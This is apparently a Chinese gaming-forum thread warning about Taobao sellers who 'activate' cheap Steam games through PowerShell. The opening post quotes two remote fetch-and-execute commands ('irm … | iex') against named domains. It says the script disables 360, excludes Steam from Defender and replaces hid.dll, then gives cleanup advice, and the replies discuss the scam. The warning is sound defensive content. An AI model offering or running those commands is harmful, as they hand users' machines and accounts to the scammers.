当心电商平台不法商家 一行指令就可以实现Steam假入库
从去年11月开始,就不断有人发现在电商购买Steam游戏key的时候,需要运行奇怪的命令相关文章:
没想到我也能被Steam假正版骗了
世风日下,淘宝 steam 店铺怎么都变成盗号的了?
steam 假激活的玩意分析
分析一个steam假入库行为,附带相关恶意样本
关于 steam.work 激活码诈骗脚本的分析
相关案例:
https://p.sda1.dev/18/0d0ab291fc1ab7705087bf39033c1a4e/example1.jpg
https://p.sda1.dev/18/b07dd7965bfc2e536bc88134ee32f63a/无标题.jpg
商家的激活教程中大都需要用PowerShell运行类似这样的命令:
irm steam-install.run | iex
irm steam.work | iex
警告:不要在你的电脑上执行这行命令
警告:不要在你的电脑上执行这行命令
警告:不要在你的电脑上执行这行命令
PowerShell的irm是Invoke-Remote-Request的缩写,意思是发起远程请求,基本上就是一个简易HTTP客户端;“|”是管道操作符,会将前一条命令的结果传递给下一条命令;iex是Invoke-Expression的缩写,意思是执行输入的命令。组合起来看的话,就是从一个网址下载其提供的脚本,然后在本地执行,也就是典中典的远程代码执行行为。而网站上托管的脚本随时都会发生更改,所以要插入恶意代码简直是轻而易举的
这些脚本经过了几次迭代,现在的版本一般会干如下几件事:
[*]让用户关闭360(如果在运行)
[*]把Steam目录添加到Windows Defender的排除列表
[*]替换Steam安装目录下的hid.dll文件,实现dll注入
如果已经不幸中招,可以参考以下的方法还原干净的Steam:
[*]卸载Steam,并手动删除C:\Users\用户名\AppData\Local\SteamActive和C:\Users\用户名\AppData\Local\Steam
[*]打开Windows安全中心,病毒和威胁防护→“病毒和威胁防护”设置→管理设置→排除项→添加或删除排除项
如果有Steam相关字眼的文件夹,就把对应条目删掉
[*]重新安装Steam
相较于以前让用户下载“激活器”来假入库,这种通过脚本的方案更加隐蔽,也更容易使买家掉以轻心,很容易骗到大量电脑知识不足的小白。
最后,上面提到的steam.work这个域名居然是有备案的,备案主体是企业,估计是拿某个企业信息套皮的。大家可以到网络违法犯罪举报网站 阿里云举报中心 狠狠地举办这些黑产网站,避免更多人受害 反正我在淘宝上举报过几家,人家现在还活得好好的 https://bbs.saraba1st.com/2b/thread-2187168-1-1.html
都打击过一轮了 powershell给小白用实在太危险了,分分钟执行把自己卖掉的操作 Tring 发表于 2024-7-31 21:41
https://bbs.saraba1st.com/2b/thread-2187168-1-1.html
都打击过一轮了
打击卖家×
打击买家✓
红信是送到买家手上的,等发现自己被vac/号没了的时候往往为时已晚 从来不在淘宝买游戏路过 2024年了 办张信用卡很难吗 ChrisSnake 发表于 2024-7-31 23:21
2024年了 办张信用卡很难吗
哪里是信用卡问题,是贪图低价的问题。
—— 来自 HUAWEI HBN-AL00, Android 12上的 S1Next-鹅版 v3.0.0.81-alpha screeper 发表于 2024-7-31 22:58
打击卖家×
打击买家✓
红信是送到买家手上的,等发现自己被vac/号没了的时候往往为时已晚 ...
没有买卖就没有杀害。 ChrisSnake 发表于 2024-7-31 23:21
2024年了 办张信用卡很难吗
未成年玩家多可能? 不太懂powershell,这个steam-install.run 是从哪那的命令,看起来也不像是什么域名 ReginaldMorgan 发表于 2024-8-1 01:34
不太懂powershell,这个steam-install.run 是从哪那的命令,看起来也不像是什么域名 ...
就是域名,只是现在无效了。
底下那个work的就还能访问。 Tring 发表于 2024-8-1 01:37
就是域名,只是现在无效了。
底下那个work的就还能访问。
哦,我脑子瓦特了,忘了.run和.work都是域名了 上淘宝买steam游戏,行吧。 Viteeee 发表于 2024-8-1 09:25
上淘宝买steam游戏,行吧。
买可以全球激活的key还行吧
上个月我还买了份失落的星球2
—— 来自 鹅球 v3.1.88-alpha steam上一些经常打折的游戏淘宝上有商家低价买入屯的,我之前有几个游戏就是想玩但还没到打折时间就买的淘宝key,只要能正常激活就行了
—— 来自 鹅球 v3.0.86-alpha 最稳的还是礼物,以前淘宝买国区礼物也是真便宜,非史低时期享受史低价。可惜囤礼物被steam砍过了,现在礼物基本逼近原价了 现在电脑小白太多了,给了这些js很多机会,老登都是买key自己激活的 半江瑟瑟半江红 发表于 2024-8-1 09:29
买可以全球激活的key还行吧
上个月我还买了份失落的星球2
买key当然没问题啊,杉果和greenman之类的平台卖的也是key,但这种要下什么三方exe的、要运行莫名其妙脚本的、要给远程控制的一看不是就有问题。
我是觉得如果自己没有识别能力、一眼看不出操作方法是否有问题,那就不要贪那个便宜吧。 看价格就知道了,明显低价的都是假入库,什么8.8元的博得3、帕鲁等等 帕鲁刚火起来的时候B站首页也不知道为啥推了好多免费入库的视频,标题都是steam打折100%什么的, 点用户发现视频都是类似的东西,举报了几个发现屁用没有. 我也在淘宝买过一些游戏
一般就便宜个15%-20%左右直接发key
有些便宜90%以上的就很明显的有问题
甚至见过要你提供账号密码的 这个东西吧,就是个筛查网,和诈骗是一个套路,把脑子正常的人过滤掉,剩下来信的上当概率竟然高达95% Viteeee 发表于 2024-8-1 09:41
买key当然没问题啊,杉果和greenman之类的平台卖的也是key,但这种要下什么三方exe的、要运行莫名其妙脚 ...
怎么说呢,这几年的新玩家因为从小的手机使用,付费观是没问题了,但是几乎都不懂安全防护了 前段时间有好多steam用户跳淘宝弹窗广告就是贪便宜中了招 看价格都知道真假了 淘宝纵容的原因。我一直很好奇,这些商家的行为是妥妥的骇客行为了吧,信息安全法也治不了他们吗?就像抓探花视频一样请几家淘宝店主吃公家饭,这事就消停了。 贪便宜吃大亏,好死
这样离谱的价格完全是一眼假啊,为啥不直接要盗版呢? 森田美位子 发表于 2024-7-31 21:11
反正我在淘宝上举报过几家,人家现在还活得好好的
没用的,淘宝和这些盗版奸商狼狈为奸,我还记得应该是22年左右,做波西亚时光的工作室联合国内游戏媒体还有几乎所有还在做单机游戏的公司,一起抵制淘宝卖盗版国产游戏资源,发了公开信,希望能够让阿里巴巴注意到整治一下。结果呢 qwwsong 发表于 2024-8-1 09:31
最稳的还是礼物,以前淘宝买国区礼物也是真便宜,非史低时期享受史低价。可惜囤礼物被steam砍过了,现在礼 ...
礼物不是会被退款么,有些黑店也不安全 阿萨辛艾沃尔 发表于 2024-8-1 12:13
没用的,淘宝和这些盗版奸商狼狈为奸,我还记得应该是22年左右,做波西亚时光的工作室联合国内游戏媒体还 ...
卖挂都入刑了,淘宝还不是照样卖
感觉淘宝的监管非常迷 现在能信用卡信用卡了,ns低价区和psn日服还是只能点卡
—— 来自 鹅球 v3.0.85-alpha liuqy 发表于 2024-8-1 12:18
礼物不是会被退款么,有些黑店也不安全
礼物正常退款需要接收人同意。当然如果刷的黑卡也没用,既然都刷黑卡了那没有任何方法是安全的 会这么复杂操作的人也不会去买这种东西吧 雲夢淵澤 发表于 2024-8-1 10:55
这个东西吧,就是个筛查网,和诈骗是一个套路,把脑子正常的人过滤掉,剩下来信的上当概率竟然高达95% ...
看着针对且仅针对360,若有所思... 我刚刚去tb看了一下,发现有些商家卖游戏标价8块钱的,我估计就是这个套路 此花开尽更无花 发表于 2024-8-1 12:07
贪便宜吃大亏,好死
这样离谱的价格完全是一眼假啊,为啥不直接要盗版呢? ...
因为这些玩家不知道哪里下盗版
页:
[1]
2